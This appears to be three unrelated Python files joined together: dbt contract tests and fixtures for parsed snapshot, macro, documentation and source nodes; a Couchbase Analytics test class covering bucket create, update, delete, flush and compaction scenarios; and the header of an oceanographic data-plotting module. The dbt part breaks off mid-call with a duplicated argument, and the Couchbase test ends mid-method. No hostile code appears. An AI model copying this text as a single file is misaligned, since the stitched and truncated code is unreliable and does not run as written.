description='',
database='test_db',
schema='test_schema',
alias='bar',
tags=[],
config=cfg,
checksum=FileHash.from_contents(''),
unrendered_config={
'strategy': 'timestamp',
'unique_key': 'id',
'updated_at': 'last_update',
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
},
)
@pytest.fixture
def basic_check_snapshot_dict():
return {
'name': 'foo',
'root_path': '/root/',
'resource_type': str(NodeType.Snapshot),
'path': '/root/x/path.sql',
'original_file_path': '/root/path.sql',
'package_name': 'test',
'raw_sql': 'select * from wherever',
'unique_id': 'model.test.foo',
'fqn': ['test', 'models', 'foo'],
'refs': [],
'sources': [],
'depends_on': {'macros': [], 'nodes': []},
'database': 'test_db',
'deferred': False,
'description': '',
'schema': 'test_schema',
'alias': 'bar',
'tags': [],
'config': {
'column_types': {},
'enabled': True,
'materialized': 'snapshot',
'persist_docs': {},
'post-hook': [],
'pre-hook': [],
'quoting': {},
'tags': [],
'vars': {},
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
'unique_key': 'id',
'strategy': 'check',
'check_cols': 'all',
},
'docs': {'show': True},
'columns': {},
'meta': {},
'checksum': {'name': 'sha256', 'checksum': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'},
'unrendered_config': {
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
'unique_key': 'id',
'strategy': 'check',
'check_cols': 'all',
},
}
@pytest.fixture
def basic_check_snapshot_object():
return ParsedSnapshotNode(
package_name='test',
root_path='/root/',
path='/root/x/path.sql',
original_file_path='/root/path.sql',
raw_sql='select * from wherever',
name='foo',
resource_type=NodeType.Snapshot,
unique_id='model.test.foo',
fqn=['test', 'models', 'foo'],
refs=[],
sources=[],
depends_on=DependsOn(),
description='',
database='test_db',
schema='test_schema',
alias='bar',
tags=[],
config=CheckSnapshotConfig(
strategy=SnapshotStrategy.Check,
unique_key='id',
check_cols=All.All,
target_database='some_snapshot_db',
target_schema='some_snapshot_schema',
),
checksum=FileHash.from_contents(''),
unrendered_config={
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
'unique_key': 'id',
'strategy': 'check',
'check_cols': 'all',
},
)
@pytest.fixture
def basic_intermediate_check_snapshot_object():
cfg = EmptySnapshotConfig()
cfg._extra.update({
'unique_key': 'id',
'strategy': 'check',
'check_cols': 'all',
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
})
return IntermediateSnapshotNode(
package_name='test',
root_path='/root/',
path='/root/x/path.sql',
original_file_path='/root/path.sql',
raw_sql='select * from wherever',
name='foo',
resource_type=NodeType.Snapshot,
unique_id='model.test.foo',
fqn=['test', 'models', 'foo'],
refs=[],
sources=[],
depends_on=DependsOn(),
description='',
database='test_db',
schema='test_schema',
alias='bar',
tags=[],
config=cfg,
checksum=FileHash.from_contents(''),
unrendered_config={
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
'unique_key': 'id',
'strategy': 'check',
'check_cols': 'all',
},
)
def test_timestamp_snapshot_ok(basic_timestamp_snapshot_dict, basic_timestamp_snapshot_object, basic_intermediate_timestamp_snapshot_object):
node_dict = basic_timestamp_snapshot_dict
node = basic_timestamp_snapshot_object
inter = basic_intermediate_timestamp_snapshot_object
assert_symmetric(node, node_dict, ParsedSnapshotNode)
assert_symmetric(inter, node_dict, IntermediateSnapshotNode)
assert ParsedSnapshotNode.from_dict(inter.to_dict()) == node
assert node.is_refable is True
assert node.is_ephemeral is False
pickle.loads(pickle.dumps(node))
def test_check_snapshot_ok(basic_check_snapshot_dict, basic_check_snapshot_object, basic_intermediate_check_snapshot_object):
node_dict = basic_check_snapshot_dict
node = basic_check_snapshot_object
inter = basic_intermediate_check_snapshot_object
assert_symmetric(node, node_dict, ParsedSnapshotNode)
assert_symmetric(inter, node_dict, IntermediateSnapshotNode)
assert ParsedSnapshotNode.from_dict(inter.to_dict()) == node
assert node.is_refable is True
assert node.is_ephemeral is False
pickle.loads(pickle.dumps(node))
def test_invalid_snapshot_bad_resource_type(basic_timestamp_snapshot_dict):
bad_resource_type = basic_timestamp_snapshot_dict
bad_resource_type['resource_type'] = str(NodeType.Model)
assert_fails_validation(bad_resource_type, ParsedSnapshotNode)
def test_basic_parsed_node_patch(basic_parsed_model_patch_object, basic_parsed_model_patch_dict):
assert_symmetric(basic_parsed_model_patch_object, basic_parsed_model_patch_dict)
@pytest.fixture
def populated_parsed_node_patch_dict():
return {
'name': 'foo',
'description': 'The foo model',
'original_file_path': '/path/to/schema.yml',
'columns': {
'a': {
'name': 'a',
'description': 'a text field',
'meta': {},
'tags': [],
},
},
'docs': {'show': False},
'meta': {'key': ['value']},
'yaml_key': 'models',
'package_name': 'test',
}
@pytest.fixture
def populated_parsed_node_patch_object():
return ParsedNodePatch(
name='foo',
description='The foo model',
original_file_path='/path/to/schema.yml',
columns={'a': ColumnInfo(name='a', description='a text field', meta={})},
meta={'key': ['value']},
yaml_key='models',
package_name='test',
docs=Docs(show=False),
)
def test_populated_parsed_node_patch(populated_parsed_node_patch_dict, populated_parsed_node_patch_object):
assert_symmetric(populated_parsed_node_patch_object, populated_parsed_node_patch_dict)
class TestParsedMacro(ContractTestCase):
ContractType = ParsedMacro
def _ok_dict(self):
return {
'name': 'foo',
'path': '/root/path.sql',
'original_file_path': '/root/path.sql',
'package_name': 'test',
'macro_sql': '{% macro foo() %}select 1 as id{% endmacro %}',
'root_path': '/root/',
'resource_type': 'macro',
'unique_id': 'macro.test.foo',
'tags': [],
'depends_on': {'macros': []},
'meta': {},
'description': 'my macro description',
'docs': {'show': True},
'arguments': [],
}
def test_ok(self):
macro_dict = self._ok_dict()
macro = self.ContractType(
name='foo',
path='/root/path.sql',
original_file_path='/root/path.sql',
package_name='test',
macro_sql='{% macro foo() %}select 1 as id{% endmacro %}',
root_path='/root/',
resource_type=NodeType.Macro,
unique_id='macro.test.foo',
tags=[],
depends_on=MacroDependsOn(),
meta={},
description='my macro description',
arguments=[],
)
self.assert_symmetric(macro, macro_dict)
self.assertEqual(macro.local_vars(), {})
pickle.loads(pickle.dumps(macro))
def test_invalid_missing_unique_id(self):
bad_missing_uid = self._ok_dict()
del bad_missing_uid['unique_id']
self.assert_fails_validation(bad_missing_uid)
def test_invalid_extra_field(self):
bad_extra_field = self._ok_dict()
bad_extra_field['extra'] = 'too many fields'
self.assert_fails_validation(bad_extra_field)
class TestParsedDocumentation(ContractTestCase):
ContractType = ParsedDocumentation
def _ok_dict(self):
return {
'block_contents': 'some doc contents',
'name': 'foo',
'original_file_path': '/root/docs/doc.md',
'package_name': 'test',
'path': '/root/docs',
'root_path': '/root',
'unique_id': 'test.foo',
}
def test_ok(self):
doc_dict = self._ok_dict()
doc = self.ContractType(
package_name='test',
root_path='/root',
path='/root/docs',
original_file_path='/root/docs/doc.md',
name='foo',
unique_id='test.foo',
block_contents='some doc contents'
)
self.assert_symmetric(doc, doc_dict)
pickle.loads(pickle.dumps(doc))
def test_invalid_missing(self):
bad_missing_contents = self._ok_dict()
del bad_missing_contents['block_contents']
self.assert_fails_validation(bad_missing_contents)
def test_invalid_extra(self):
bad_extra_field = self._ok_dict()
bad_extra_field['extra'] = 'more'
self.assert_fails_validation(bad_extra_field)
@pytest.fixture
def minimum_parsed_source_definition_dict():
return {
'package_name': 'test',
'root_path': '/root',
'path': '/root/models/sources.yml',
'original_file_path': '/root/models/sources.yml',
'database': 'some_db',
'schema': 'some_schema',
'fqn': ['test', 'source', 'my_source', 'my_source_table'],
'source_name': 'my_source',
'name': 'my_source_table',
'source_description': 'my source description',
'loader': 'stitch',
'identifier': 'my_source_table',
'resource_type': str(NodeType.Source),
'unique_id': 'test.source.my_source.my_source_table',
}
@pytest.fixture
def basic_parsed_source_definition_dict():
return {
'package_name': 'test',
'root_path': '/root',
'path': '/root/models/sources.yml',
'original_file_path': '/root/models/sources.yml',
'database': 'some_db',
'schema': 'some_schema',
'fqn': ['test', 'source', 'my_source', 'my_source_table'],
'source_name': 'my_source',
'name': 'my_source_table',
'source_description': 'my source description',
'loader': 'stitch',
'identifier': 'my_source_table',
'resource_type': str(NodeType.Source),
'description': '',
'columns': {},
'quoting': {},
'unique_id': 'test.source.my_source.my_source_table',
'meta': {},
'source_meta': {},
'tags': [],
'config': {
'enabled': True,
},
'unrendered_config': {},
}
@pytest.fixture
def basic_parsed_source_definition_object():
return ParsedSourceDefinition(
columns={},
database='some_db',
description='',
fqn=['test', 'source', 'my_source', 'my_source_table'],
identifier='my_source_table',
loader='stitch',
name='my_source_table',
original_file_path='/root/models/sources.yml',
package_name='test',
path='/root/models/sources.yml',
quoting=Quoting(),
resource_type=NodeType.Source,
root_path='/root',
schema='some_schema',
source_description='my source description',
source_name='my_source',
unique_id='test.source.my_source.my_source_table',
tags=[],
config=SourceConfig(),
)
@pytest.fixture
def complex_parsed_source_definition_dict():
return {
'package_name': 'test',
'root_path': '/root',
'path': '/root/models/sources.yml',
'original_file_path': '/root/models/sources.yml',
'database': 'some_db',
'schema': 'some_schema',
'fqn': ['test', 'source', 'my_source', 'my_source_table'],
'source_name': 'my_source',
'name': 'my_source_table',
'source_description': 'my source description',
'loader': 'stitch',
'identifier': 'my_source_table',
'resource_type': str(NodeType.Source),
'description': '',
'columns': {},
'quoting': {},
'unique_id': 'test.source.my_source.my_source_table',
'meta': {},
'source_meta': {},
'tags': ['my_tag'],
'config': {
'enabled': True,
},
'freshness': {
'warn_after': {'period': 'hour', 'count': 1},
},
'loaded_at_field': 'loaded_at',
'unrendered_config': {},
}
@pytest.fixture
def complex_parsed_source_definition_object():
return ParsedSourceDefinition(
columns={},
database='some_db',
description='',
fqn=['test', 'source', 'my_source', 'my_source_table'],
identifier='my_source_table',
loader='stitch',
name='my_source_table',
original_file_path='/root/models/sources.yml',
package_name='test',
path='/root/models/sources.yml',
quoting=Quoting(),
resource_type=NodeType.Source,
root_path='/root',
schema='some_schema',
source_description='my source description',
source_name='my_source',
unique_id='test.source.my_source.my_source_table',
tags=['my_tag'],
config=SourceConfig(),
freshness=FreshnessThreshold(warn_after=Time(period=TimePeriod.hour, count=1)),
loaded_at_field='loaded_at',
)
def test_basic_source_definition(minimum_parsed_source_definition_dict, basic_parsed_source_definition_dict, basic_parsed_source_definition_object):
node = basic_parsed_source_definition_object
node_dict = basic_parsed_source_definition_dict
minimum = minimum_parsed_source_definition_dict
assert_symmetric(node, node_dict, ParsedSourceDefinition)
assert node.is_ephemeral is False
assert node.is_refable is False
assert node.has_freshness is False
assert_from_dict(node, minimum, ParsedSourceDefinition)
pickle.loads(pickle.dumps(node))
def test_invalid_missing(minimum_parsed_source_definition_dict):
bad_missing_name = minimum_parsed_source_definition_dict
del bad_missing_name['name']
assert_fails_validation(bad_missing_name, ParsedSourceDefinition)
def test_invalid_bad_resource_type(minimum_parsed_source_definition_dict):
bad_resource_type = minimum_parsed_source_definition_dict
bad_resource_type['resource_type'] = str(NodeType.Model)
assert_fails_validation(bad_resource_type, ParsedSourceDefinition)
def test_complex_source_definition(complex_parsed_source_definition_dict, complex_parsed_source_definition_object):
node = complex_parsed_source_definition_object
node_dict = complex_parsed_source_definition_dict
assert_symmetric(node, node_dict, ParsedSourceDefinition)
assert node.is_ephemeral is False
assert node.is_refable is False
assert node.has_freshness is True
pickle.loads(pickle.dumps(node))
def test_source_no_loaded_at(complex_parsed_source_definition_object):
node = complex_parsed_source_definition_object
assert node.has_freshness is True
# no loaded_at_field -> does not have freshness
node.loaded_at_field = None
assert node.has_freshness is False
def test_source_no_freshness(complex_parsed_source_definition_object):
node = complex_parsed_source_definition_object
assert node.has_freshness is True
node.freshness = None
assert node.has_freshness is False
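The two tests above pin down that `has_freshness` requires both a freshness threshold and a loaded-at field. That invariant can be sketched with a simplified stand-in class (not the dbt `ParsedSourceDefinition`):

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class SourceSketch:
    # Minimal model of a source's freshness-related fields.
    freshness: Optional[dict] = None
    loaded_at_field: Optional[str] = None

    @property
    def has_freshness(self):
        # Freshness checks need both a threshold and a column to compare.
        return bool(self.freshness) and self.loaded_at_field is not None

s = SourceSketch(freshness={'warn_after': {'period': 'hour', 'count': 1}},
                 loaded_at_field='loaded_at')
print(s.has_freshness)  # both set -> True
s.loaded_at_field = None
print(s.has_freshness)  # missing loaded_at_field -> False
```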
unchanged_source_definitions = [
lambda u: (u, u.replace(tags=['mytag'])),
lambda u: (u, u.replace(meta={'a': 1000})),
]
changed_source_definitions = [
lambda u: (u, u.replace(freshness=FreshnessThreshold(warn_after=Time(period=TimePeriod.hour, count=1)), loaded_at_field='loaded_at')),
lambda u: (u, u.replace(loaded_at_field='loaded_at')),
lambda u: (u, u.replace(freshness=FreshnessThreshold(error_after=Time(period=TimePeriod.hour, count=1)))),
lambda u: (u, u.replace(quoting=Quoting(identifier=True))),
lambda u: (u, u.replace(database='other_database')),
lambda u: (u, u.replace(schema='other_schema')),
lambda u: (u, u.replace(identifier='identifier')),
]
@pytest.mark.parametrize('func', unchanged_source_definitions)
def test_compare_unchanged_parsed_source_definition(func, basic_parsed_source_definition_object):
node, compare = func(basic_parsed_source_definition_object)
assert node.same_contents(compare)
@pytest.mark.parametrize('func', changed_source_definitions)
def test_compare_changed_source_definition(func, basic_parsed_source_definition_object):
node, compare = func(basic_parsed_source_definition_object)
assert not node.same_contents(compare)
@pytest.fixture
def minimal_parsed_exposure_dict():
return {
'name': 'my_exposure',
'type': 'notebook',
'owner': {
'email': '<EMAIL>',
},
'fqn': ['test', 'exposures', 'my_exposure'],
'unique_id': 'exposure.test.my_exposure',
'package_name': 'test',
'path': 'models/something.yml',
'root_path': '/usr/src/app',
'original_file_path': 'models/something.yml',
}
@pytest.fixture
def basic_parsed_exposure_dict():
return {
'name': 'my_exposure',
'type': 'notebook',
'owner': {
'email': '<EMAIL>',
},
'resource_type': 'exposure',
'depends_on': {
'nodes': [],
'macros': [],
},
'refs': [],
'sources': [],
'fqn': ['test', 'exposures', 'my_exposure'],
'unique_id': 'exposure.test.my_exposure',
'package_name': 'test',
'path': 'models/something.yml',
'root_path': '/usr/src/app',
'original_file_path': 'models/something.yml',
}
@pytest.fixture
def basic_parsed_exposure_object():
return ParsedExposure(
name='my_exposure',
name='my_exposure',
import json
import time
from BucketLib.BucketOperations import BucketHelper
from cb_tools.cbstats import Cbstats
from cbas_base import CBASBaseTest
from couchbase_helper.documentgenerator import doc_generator
from memcached.helper.data_helper import MemcachedClientHelper
from remote.remote_util import RemoteMachineShellConnection
from sdk_client3 import SDKClient
from sdk_exceptions import SDKException
class CBASBucketOperations(CBASBaseTest):
def setUp(self):
super(CBASBucketOperations, self).setUp()
''' Considering all the scenarios where:
1. There is 1 KV node and multiple CBAS nodes
(and the test wants to add all of the CBAS nodes to the cluster)
2. There is 1 KV node and multiple CBAS nodes
(and the test wants only 1 CBAS node)
3. There is only 1 node, running both the KV and CBAS services.
NOTE: Cases where nodes run only CBAS are still pending;
those need a per-node service check.
'''
if self.bucket_time_sync:
self.bucket_util._set_time_sync_on_buckets(["default"])
self.cluster_util.print_cluster_stats()
self.bucket_util.print_bucket_stats()
def tearDown(self):
self.cleanup_cbas()
super(CBASBucketOperations, self).tearDown()
def setup_for_test(self, skip_data_loading=False):
if not skip_data_loading:
# Load Couchbase bucket first
self.perform_doc_ops_in_all_cb_buckets(
"create",
0,
self.num_items,
durability=self.durability_level)
self.bucket_util.verify_stats_all_buckets(self.num_items)
if self.test_abort_snapshot:
self.log.info("Creating sync_write aborts before dataset creation")
for server in self.cluster_util.get_kv_nodes():
ssh_shell = RemoteMachineShellConnection(server)
cbstats = Cbstats(ssh_shell)
replica_vbs = cbstats.vbucket_list(
self.bucket_util.buckets[0].name,
"replica")
load_gen = doc_generator("test_abort_key", 0, self.num_items,
target_vbucket=replica_vbs)
success = self.bucket_util.load_durable_aborts(
ssh_shell, [load_gen],
self.bucket_util.buckets[0],
self.durability_level,
"update", "all_aborts")
if not success:
self.log_failure("Simulating aborts failed")
ssh_shell.disconnect()
self.validate_test_failure()
# Create dataset on the CBAS bucket
self.cbas_util.create_dataset_on_bucket(
cbas_bucket_name=self.cb_bucket_name,
cbas_dataset_name=self.cbas_dataset_name)
if self.test_abort_snapshot:
self.log.info("Creating sync_write aborts after dataset creation")
for server in self.cluster_util.get_kv_nodes():
ssh_shell = RemoteMachineShellConnection(server)
cbstats = Cbstats(ssh_shell)
replica_vbs = cbstats.vbucket_list(
self.bucket_util.buckets[0].name,
"replica")
load_gen = doc_generator("test_abort_key", 0, self.num_items,
target_vbucket=replica_vbs)
success = self.bucket_util.load_durable_aborts(
ssh_shell, [load_gen],
self.bucket_util.buckets[0],
self.durability_level,
"update", "all_aborts")
if not success:
self.log_failure("Simulating aborts failed")
ssh_shell.disconnect()
self.validate_test_failure()
# Create indexes on the CBAS bucket
self.create_secondary_indexes = \
self.input.param("create_secondary_indexes", True)
if self.create_secondary_indexes:
self.index_fields = "profession:string,number:bigint"
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, self.index_fields)
status, metrics, errors, results, _ = \
self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(
self.index_name,
self.index_fields.split(","),
self.cbas_dataset_name)[0])
# Connect to Bucket
self.cbas_util.connect_to_bucket(
cbas_bucket_name=self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
if self.test_abort_snapshot:
self.log.info("Creating sync_write aborts after dataset connect")
for server in self.cluster_util.get_kv_nodes():
ssh_shell = RemoteMachineShellConnection(server)
cbstats = Cbstats(ssh_shell)
replica_vbs = cbstats.vbucket_list(
self.bucket_util.buckets[0].name,
"replica")
load_gen = doc_generator("test_abort_key", 0, self.num_items,
target_vbucket=replica_vbs)
success = self.bucket_util.load_durable_aborts(
ssh_shell, [load_gen],
self.bucket_util.buckets[0],
self.durability_level,
"update", "all_aborts")
if not success:
self.log_failure("Simulating aborts failed")
ssh_shell.disconnect()
self.validate_test_failure()
if not skip_data_loading:
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def load_docs_in_cb_bucket_before_cbas_connect(self):
self.setup_for_test()
def load_docs_in_cb_bucket_before_and_after_cbas_connect(self):
self.setup_for_test()
# Load more docs in Couchbase bucket.
self.perform_doc_ops_in_all_cb_buckets(
"create",
self.num_items,
self.num_items * 2)
self.bucket_util.verify_stats_all_buckets(self.num_items*2)
if self.test_abort_snapshot:
self.log.info("Creating sync_write aborts after dataset connect")
for server in self.cluster_util.get_kv_nodes():
ssh_shell = RemoteMachineShellConnection(server)
cbstats = Cbstats(ssh_shell)
replica_vbs = cbstats.vbucket_list(
self.bucket_util.buckets[0].name,
"replica")
load_gen = doc_generator("test_abort_key",
self.num_items,
self.num_items,
target_vbucket=replica_vbs)
success = self.bucket_util.load_durable_aborts(
ssh_shell, [load_gen],
self.bucket_util.buckets[0],
self.durability_level,
"update", "all_aborts")
if not success:
self.log_failure("Simulating aborts failed")
ssh_shell.disconnect()
self.validate_test_failure()
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items * 2):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def load_docs_in_cb_bucket_after_cbas_connect(self):
self.setup_for_test(skip_data_loading=True)
# Load the Couchbase bucket after the CBAS connect.
self.perform_doc_ops_in_all_cb_buckets(
"create",
0,
self.num_items)
self.bucket_util.verify_stats_all_buckets(self.num_items)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def delete_some_docs_in_cb_bucket(self):
self.setup_for_test()
# Delete some docs in Couchbase bucket.
self.perform_doc_ops_in_all_cb_buckets(
"delete",
0,
self.num_items / 2)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items / 2):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def delete_all_docs_in_cb_bucket(self):
self.setup_for_test()
# Delete all docs in Couchbase bucket.
self.perform_doc_ops_in_all_cb_buckets(
"delete",
0,
self.num_items)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name, 0):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def update_some_docs_in_cb_bucket(self):
self.setup_for_test()
# Update some docs in Couchbase bucket
self.perform_doc_ops_in_all_cb_buckets(
"update",
0,
self.num_items / 10,
mutation_num=1)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items,
self.num_items / 10):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def update_all_docs_in_cb_bucket(self):
self.setup_for_test()
# Update all docs in Couchbase bucket
self.perform_doc_ops_in_all_cb_buckets(
"update",
0,
self.num_items, mutation_num=1)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items,
self.num_items):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def create_update_delete_cb_bucket_then_cbas_connect(self):
self.setup_for_test()
# Disconnect from bucket
self.cbas_util.disconnect_from_bucket(self.cbas_bucket_name)
# Perform Create, Update, Delete ops in the CB bucket
self.perform_doc_ops_in_all_cb_buckets(
"create",
self.num_items,
self.num_items * 2)
self.bucket_util.verify_stats_all_buckets(self.num_items*2)
self.perform_doc_ops_in_all_cb_buckets(
"update",
0,
self.num_items,
mutation_num=1)
self.perform_doc_ops_in_all_cb_buckets(
"delete",
0,
self.num_items / 2)
# Connect to Bucket
self.cbas_util.connect_to_bucket(
cbas_bucket_name=self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items * 3 / 2,
self.num_items / 2):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def create_update_delete_cb_bucket_with_cbas_connected(self):
self.setup_for_test()
# Perform Create, Update, Delete ops in the CB bucket
self.perform_doc_ops_in_all_cb_buckets(
"create",
self.num_items,
self.num_items * 2)
self.perform_doc_ops_in_all_cb_buckets(
"update",
0,
self.num_items,
mutation_num=1)
self.perform_doc_ops_in_all_cb_buckets(
"delete",
0,
self.num_items / 2)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items * 3 / 2,
self.num_items / 2):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def flush_cb_bucket_with_cbas_connected(self):
self.setup_for_test()
# Flush the CB bucket
BucketHelper(self.cluster.master).flush_bucket(self.cb_bucket_name)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name, 0):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def flush_cb_bucket_then_cbas_connect(self):
self.setup_for_test()
# Disconnect from bucket
self.cbas_util.disconnect_from_bucket(self.cbas_bucket_name)
# Flush the CB bucket
BucketHelper(self.cluster.master).flush_bucket(self.cb_bucket_name)
# Connect to Bucket
self.cbas_util.connect_to_bucket(
cbas_bucket_name=self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name, 0):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def delete_cb_bucket_with_cbas_connected(self):
self.setup_for_test()
# Delete the CB bucket
self.cluster.bucket_delete(server=self.cluster.master,
bucket=self.cb_bucket_name)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name, 0):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def delete_cb_bucket_then_cbas_connect(self):
self.setup_for_test()
# Disconnect from bucket
self.cbas_util.disconnect_from_bucket(self.cbas_bucket_name)
# Delete the CB bucket
self.cluster.bucket_delete(server=self.cluster.master,
bucket=self.cb_bucket_name)
# Connect to Bucket
self.cbas_util.connect_to_bucket(
cbas_bucket_name=self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name, 0):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
"""
cbas.cbas_bucket_operations.CBASBucketOperations:
delete_kv_bucket_then_drop_dataset_without_disconnecting_link,
cb_bucket_name=default,cbas_bucket_name=default_cbas,
cbas_dataset_name=ds,num_items=10000
"""
def delete_kv_bucket_then_drop_dataset_without_disconnecting_link(self):
# setup test
self.setup_for_test()
# Delete the KV bucket
deleted = BucketHelper(self.cluster.master).delete_bucket()
self.assertTrue(deleted, "Deletion of KV bucket failed")
# Check Bucket state
start_time = time.time()
while start_time + 120 > time.time():
status, content, _ = self.cbas_util.fetch_bucket_state_on_cbas()
self.assertTrue(status, msg="Fetch bucket state failed")
content = json.loads(content)
self.log.info(content)
if content['buckets'][0]['state'] == "disconnected":
break
self.sleep(1)
# Drop dataset with out disconnecting the Link
self.sleep(2, message="Sleeping 2 seconds after bucket disconnect")
self.assertTrue(self.cbas_util.drop_dataset(self.cbas_dataset_name),
msg="Failed to drop dataset")
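The disconnect wait above is a poll-with-timeout pattern. A generic, self-contained sketch (the fetcher and state names here are hypothetical stand-ins for the CBAS utilities):

```python
import time

def wait_for_state(fetch_state, target, timeout=120, interval=1):
    # Poll fetch_state() until it returns `target` or `timeout`
    # seconds elapse. Returns True on success, False on timeout.
    deadline = time.time() + timeout
    while time.time() < deadline:
        if fetch_state() == target:
            return True
        time.sleep(interval)
    return False

# Simulated fetcher: reports "connected" twice, then "disconnected".
states = iter(["connected", "connected", "disconnected"])
ok = wait_for_state(lambda: next(states), "disconnected",
                    timeout=5, interval=0)
print(ok)  # -> True
```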
def compact_cb_bucket_with_cbas_connected(self):
self.setup_for_test()
# Compact the CB bucket
BucketHelper(self.cluster.master).compact_bucket(self.cb_bucket_name)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def compact_cb_bucket_then_cbas_connect(self):
self.setup_for_test()
# Disconnect from bucket
self.cbas_util.disconnect_from_bucket(self.cbas_bucket_name)
# Compact the CB bucket
BucketHelper(self.cluster.master).compact_bucket(self.cb_bucket_name)
# Connect to Bucket
self.cbas_util.connect_to_bucket(
cbas_bucket_name=self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items):
            self.fail("No. of items in CBAS dataset do not match "
                      "that in the CB bucket")
def test_ingestion_resumes_on_reconnect(self):
self.setup_for_test()
        self.perform_doc_ops_in_all_cb_buckets(
            "update",
            0,
            self.num_items // 4,
            mutation_num=1)
        self.cbas_util.validate_cbas_dataset_items_count(
            self.cbas_dataset_name,
            self.num_items,
            self.num_items // 4)
# Disconnect from bucket
self.cbas_util.disconnect_from_bucket(self.cbas_bucket_name)
        self.perform_doc_ops_in_all_cb_buckets(
            "update",
            self.num_items // 4,
            self.num_items // 2,
            mutation_num=1)
        # Connect to Bucket and sleep for 5s to allow ingestion to start
self.cbas_util.connect_to_bucket(
cbas_bucket_name=self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
self.sleep(5)
# Validate no. of items in CBAS dataset
count, mutated_count = self.cbas_util.get_num_items_in_cbas_dataset(
self.cbas_dataset_name)
        if not (self.num_items // 4 < mutated_count):
self.fail("Count after bucket connect = %s. "
"Ingestion has restarted." % mutated_count)
else:
self.log.info("Count after bucket connect = %s", mutated_count)
def test_ingestion_after_kv_rollback(self):
self.setup_for_test()
# Stop Persistence on Node A & Node B
self.log.info("Stopping persistence on NodeA & NodeB")
mem_client = MemcachedClientHelper.direct_client(self.input.servers[0],
self.cb_bucket_name)
mem_client.stop_persistence()
mem_client = MemcachedClientHelper.direct_client(self.input.servers[1],
self.cb_bucket_name)
mem_client.stop_persistence()
# GFPy/Ocean.py
# -*- coding: utf-8 -*-
"""
This module contains functions that read (and plot) various
oceanographic instrument data. This includes:
- CTD (incl. mini CTD)
- ADCP
- drifter
- mooring
The functions are optimized for the file formats typically used
in student cruises at the Geophysical Institute.
"""
from seabird.cnv import fCNV
import gsw
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from netCDF4 import Dataset,num2date
import glob
from scipy.interpolate import interp1d,griddata
import scipy.io as spio
from scipy.io import loadmat
from matplotlib.dates import date2num,datestr2num
import cmocean
import cartopy.crs as ccrs
import cartopy.feature
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import pandas as pd
from adjustText import adjust_text as adj_txt
############################################################################
# MISCELLANEOUS FUNCTIONS
############################################################################
def cal_dist_dir_on_sphere(longitude, latitude):
"""
function to calculate a series of distances between
coordinate points (longitude and latitude)
of the drifter between sequential timesteps
Parameters
----------
    longitude : pd.Series
        time Series of longitudinal coordinates [deg] of the drifter
    latitude : pd.Series
        time Series of latitudinal coordinates [deg] of the drifter
Returns
-------
speed : pd.Series
speed the drifter travelled between each of the timesteps
heading : pd.Series
direction drifter headed between each of the timesteps
"""
